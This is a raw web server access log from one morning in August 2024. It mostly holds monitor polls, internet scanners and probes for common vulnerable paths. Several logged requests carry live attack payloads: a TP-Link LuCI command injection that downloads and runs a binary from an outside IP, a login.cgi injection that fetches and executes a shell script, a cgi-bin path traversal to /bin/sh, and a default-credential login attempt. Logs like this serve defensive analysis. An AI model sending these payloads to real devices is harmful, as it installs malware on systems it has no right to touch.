45.58.184.139 - - [04/Aug/2024:06:09:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.58.184.139 - - [04/Aug/2024:06:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:57 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
45.58.184.139 - - [04/Aug/2024:06:09:57 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
45.58.184.139 - - [04/Aug/2024:06:09:58 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
45.58.184.139 - - [04/Aug/2024:06:09:58 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:59 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:59 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:59 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:10:09 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0"
94.156.68.162 - - [04/Aug/2024:06:11:29 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-A910F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
185.191.126.213 - - [04/Aug/2024:06:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:23:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.185.140 - - [04/Aug/2024:06:26:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
159.203.88.160 - - [04/Aug/2024:06:28:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.203.88.160 - - [04/Aug/2024:06:28:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.203.88.160 - - [04/Aug/2024:06:28:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:06:28:11 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:06:28:12 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:06:28:12 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.191.126.213 - - [04/Aug/2024:06:30:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:31:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.177 - - [04/Aug/2024:06:32:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
5.230.54.93 - - [04/Aug/2024:06:36:28 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.191.126.213 - - [04/Aug/2024:06:36:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:40:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:43:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:48:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.130.4 - - [04/Aug/2024:06:50:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [04/Aug/2024:06:50:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:06:55:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
31.15.202.43 - - [04/Aug/2024:06:59:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.191.126.213 - - [04/Aug/2024:07:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.66.116 - - [04/Aug/2024:07:04:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
167.94.145.96 - - [04/Aug/2024:07:06:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.96 - - [04/Aug/2024:07:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.96 - - [04/Aug/2024:07:07:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.96 - - [04/Aug/2024:07:07:02 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:08:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.100.253 - - [04/Aug/2024:07:10:50 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.100.253 - - [04/Aug/2024:07:10:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.100.253 - - [04/Aug/2024:07:10:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.100.253 - - [04/Aug/2024:07:10:53 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.100.253 - - [04/Aug/2024:07:10:53 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.100.253 - - [04/Aug/2024:07:10:53 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:07:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:11:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.22.143.72 - - [04/Aug/2024:07:12:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
34.78.1.92 - - [04/Aug/2024:07:12:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
212.91.246.72 - - [04/Aug/2024:07:12:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Aug/2024:07:13:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
34.22.214.26 - - [04/Aug/2024:07:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
212.91.246.72 - - [04/Aug/2024:07:14:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:15:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.58.222 - - [04/Aug/2024:07:16:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
212.91.246.72 - - [04/Aug/2024:07:16:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:17:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:18:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.185.140 - - [04/Aug/2024:07:19:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Aug/2024:07:19:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:21:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.73 - - [04/Aug/2024:07:22:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.73 - - [04/Aug/2024:07:22:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:22:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:23:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:24:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:25:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [04/Aug/2024:07:26:29 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [04/Aug/2024:07:26:41 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:26:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.186.18 - - [04/Aug/2024:07:27:05 +0200] "\x16\x03\x01\x01\x18\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:27:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:28:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Aug/2024:07:29:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:29:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.134 - - [04/Aug/2024:07:30:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:30:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.67 - - [04/Aug/2024:07:31:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:31:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:32:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:34:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.185.140 - - [04/Aug/2024:07:34:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [04/Aug/2024:07:34:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:35:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:36:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.102.12.49 - - [04/Aug/2024:07:36:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [04/Aug/2024:07:37:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:38:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:39:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:40:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:07:40:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
185.191.126.213 - - [04/Aug/2024:07:40:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:41:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:42:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Aug/2024:07:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:43:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:44:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.210.135 - - [04/Aug/2024:07:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Aug/2024:07:45:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:46:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:47:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:48:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Aug/2024:07:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:49:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:50:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:51:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:52:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:53:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:07:53:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
157.20.159.190 - - [04/Aug/2024:07:53:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.13.227.24/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Aug/2024:07:54:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.49 - - [04/Aug/2024:07:54:24 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:55:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.107.2.92 - - [04/Aug/2024:07:56:20 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [04/Aug/2024:07:57:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:07:58:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.77 - - [04/Aug/2024:07:58:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Aug/2024:07:59:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:01:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:02:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:03:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
144.126.192.174 - - [04/Aug/2024:08:03:31 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:03:35 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:04:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:04:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:05:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Aug/2024:08:05:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:06:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:07:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:07:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:08:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:09:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
144.126.192.174 - - [04/Aug/2024:08:09:18 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:19 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:26 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:27 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:27 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:28 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
144.126.192.174 - - [04/Aug/2024:08:09:38 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:10:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:11:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:11:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:12:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:12:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:13:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:14:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:14:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:15:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:16:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
